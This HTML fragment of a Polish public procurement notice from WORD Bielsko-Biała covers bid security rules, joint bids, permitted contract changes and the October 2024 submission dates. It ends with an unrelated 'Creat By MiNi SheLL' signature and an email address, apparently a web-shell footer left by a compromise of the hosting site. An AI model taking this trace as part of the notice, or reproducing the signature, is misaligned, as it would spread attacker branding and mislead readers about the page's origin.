Bielsku-Bałej”, <br/>W treści dokumentu powinien być wskazany indywidualny identyfikator zamówienia z zachowaniem poniższego formatu: WORD-WAT-3231-2/24,<br/>Dokument poręczenia/gwarancji powinien być ważny przez cały okres związania ofertą oraz stanowić zobowiązanie poręczyciela lub gwaranta do nieodwołalnej, bezwarunkowej, płatnej na pierwsze żądanie Zamawiającego wypłaty wadium w przypadkach określonych w art. 98 ust. 6 ustawy;<br/> 7. Dokument wadialny wnoszony w formie niepieniężnej należy dołączyć do oferty w oryginale w formie dokumentu elektronicznego;<br/> 8. Dokument poręczenia lub gwarancji powinien wskazywać beneficjenta – Zamawiającego, tj.: Wojewódzki Ośrodek Ruchu Drogowego (WORD) w Bielsku-Białej, Al. Armii Krajowej 220A, 43-316 Bielsko-Biała, NIP 5471823270<br/> 9. Błędne wskazanie Beneficjenta będzie skutkowało odrzuceniem oferty na podstawie art. 226 ust. 1 pkt 14 ustawy;<br/> 10. Jeżeli Wykonawca jest podmiotem niepodlegającym reżimowi prawa polskiego i właściwości sądów polskich, w treści gwarancji musi figurować zapis o poddaniu sporów wynikających z wadium prawu polskiemu i polskiemu sądownictwu; <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1. Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takim przypadku powinni spełniać warunki udziału w postępowaniu oraz złożyć dokumenty potwierdzające spełnienie tych warunków zgodnie z zapisami zawartymi w Rozdziale IX i X Specyfikacji.<br/> 2. W przypadku składania oferty przez Wykonawców wspólnie ubiegających się o zamówienie Wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu albo reprezentowania ich w postępowaniu i zawarcia umowy. Pełnomocnictwo winno być podpisane przez osobę/osoby uprawnioną (-e) do jego udzielenia tj. zgodnie z formą reprezentacji każdego z Wykonawców (podpisane kwalifikowanym podpisem elektronicznym lub profilem zaufanym lub podpisem osobistym). Dopuszczalne jest przedłożenie przez wykonawców wspólnie ubiegających się o zamówienie umowę regulująca współpracę tych wykonawców o ile z umowy tej wynika pełnomocnictwo do reprezentowania tych wykonawców. <br/> 3. Wszelka korespondencja oraz rozliczenia dokonywane będą wyłącznie z Wykonawcą występującym jako Pełnomocnik uprawniony do reprezentowania pozostałych wykonawców wspólnie ubiegających się o zamówienie. Wszelkie oświadczenia pełnomocnika Zamawiający uzna za wiążące dla wykonawców wspólnie ubiegających się o zamówienie;<br/> 4. Nie dopuszcza się w niniejszym postępowaniu uczestniczenia któregokolwiek z Wykonawców wspólnie ubiegających się o zamówienie w więcej niż jednej grupie Wykonawców wspólnie ubiegających się o zamówienie;<br/> 5. Nie dopuszcza się również równoczesnego złożenia przez któregokolwiek z Wykonawców wspólnie ubiegających się o zamówienie oferty indywidualnej oraz w ramach grupy Wykonawców wspólnie ubiegających się o zamówienie;<br/> 6. Wykonawcy wspólnie ubiegający się o zamówienie, których oferta zostanie uznana za najkorzystniejszą, będą zobowiązani przedstawić Zamawiającemu przed zawarciem umowy stosowne porozumienie/umowę regulującą ich współpracę.<br/> 7. Jeżeli Wykonawca nie złożył wymaganych pełnomocnictw albo złożył wadliwe pełnomocnictwa, Zamawiający wzywa do ich złożenia w terminie przez siebie wskazanym, chyba że mimo ich złożenia oferta Wykonawcy podlega odrzuceniu albo konieczne byłoby unieważnienie postępowania.<br/> 8. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia składają oświadczenie o którym mowa w art. 117 ust. 4 ustawy, z którego wynika, które dostawy wykonają poszczególni Wykonawcy, którego wzór stanowi załącznik do Specyfikacji.<br/> 9. Oświadczenia i dokumenty potwierdzające brak podstaw do wykluczenia z postępowania składa każdy z Wykonawców wspólnie ubiegających się o zamówienie. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> W oparciu o postanowienia art. 455 ust. 1 pkt 1 ustawy Zamawiający przewiduje możliwość następujących zmian umowy bez konieczności przeprowadzenia nowego postępowania:<br/> 1. zmiana trybu zasad i terminu rozliczenia wynagrodzenia umownego, wystawiania faktur, płatności oraz zasad i trybu odbioru przedmiotu zamówienia w przypadku zaistnienia okoliczności uzasadniających taką zmianę, czy zaistnienia innej okoliczności uzasadniającej wprowadzenie takiej modyfikacji,<br/> 2. zmiany terminu wykonanie przedmiotu umowy<br/> 3. zmiany wynagrodzenia w wyniku zmiany stawki podatku od towarów i usług VAT,<br/> 4. gdy zmiana spowodowana jest zmianą obowiązujących przepisów mających wpływ na wykonywanie przedmiotu umowy, w szczególności zmiany norm technicznych lub technologicznych, przepisów dotyczących ochrony środowiska,<br/> 5. powstała możliwość zastosowania nowszych i korzystniejszych dla Zamawiającego rozwiązań technologicznych i technicznych, niż te istniejące w chwili zawarcia Umowy, a wprowadzenie tych rozwiązań nie powoduje podwyższenia wynagrodzenia Wykonawcy,<br/> 6. nastąpiła zmiana w dokumentacji homologacyjnej oznaczenia wariantu pojazdu bazowego związana z wprowadzeniem nowego rozszerzenia homologacyjnego,<br/> 7. inne zmiany spowodowane przyczynami zewnętrznymi, niezależnymi od Zamawiającego oraz Wykonawcy skutkującymi niemożliwością wykonania przedmiotu umowy na warunkach określonych w umowie,<br/> 8. wskazania nowego podwykonawcy bądź zmiany wskazanych w par. 5 podwykonawców lub zakresu usług wykonawczych przez aktualnych podwykonawców,<br/> 9. zgłaszania przez Wykonawcę, po zawarciu umowy, zlecenia części dostaw podwykonawcy, nie wskazanemu wcześniej przez Wykonawcę w ofercie oraz możliwość rozszerzenia zakresu podwykonawstwa w porównaniu do wskazanego w ofercie Wykonawcy, o ile posłużenie się podwykonawcą doprowadzi do poprawienia jakości lub skrócenia czasu wykonywania dostawy:<br/> a) w przypadku wystąpienia okoliczności wskazanych w ust. 1 pkt 2, Wykonawca ma prawo złożyć Zamawiającemu wniosek ze szczegółowym uzasadnieniem o przedłużeniu terminu wskazanego w par. 2 ust. 1 niniejszej umowy,<br/> b) w przypadku wystąpienia opóźnienia z powodów przedstawionych w ust. 1 pkt. 2 strony ustalą nowy termin wykonania umowy, z tym, że minimalny okres przesunięcia terminu zakończenia realizacji umowy równy będzie okresowi przerwy lub postoju. Nowy termin realizacji umowy zostanie ustalony w protokole konieczności, na podstawie którego zostanie sporządzony aneks do umowy.<br/> c) postanowienia umowne zmienione z naruszeniem art. 454 i 455 podlegają unieważnieniu. Na miejsce unieważnionych postanowień umowy wchodzą postanowienia umowne w pierwotnym brzmieniu, zgodnie z postanowieniami art. 458 ustawy.<br/> d) jeżeli Zamawiający zamierza zmienić warunki realizacji zamówienia, które wykraczają poza zmiany umowy dopuszczalne zgodnie z art. 454 i 455 ustawy, obowiązany jest przeprowadzić nowe postępowanie o udzielenie zamówienia, zgodnie z postanowieniami art. 454 ustawy,<br/> e) wszystkie powyższe postanowienia stanowią katalog zmian, na które Zamawiający może wyrazić zgodę. Nie stanowią jednocześnie zobowiązania do wyrażenia takiej zgody,<br/> f) nie stanowi zmiany umowy:<br/>- zmiana danych związanych z obsługą administracyjno-organizacyjną umowy (np. zmiana dokumentów potwierdzających wykonanie prac)<br/>- zmiana danych teleadresowych<br/> Wszelkie zmiany i uzupełnienia treści umowy wymagają formy pisemnej pod rygorem nieważności, z zastrzeżeniem postanowień ust. 7. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2024-10-25 11:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Ofertę należy złożyć na stronie prowadzonego postępowania pod adresem wskazanym w rozdziale IV SWZ ust. 1 za pośrednictwem Platformy e-Zamówienia;</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2024-10-25 11:10</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2024-11-23</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com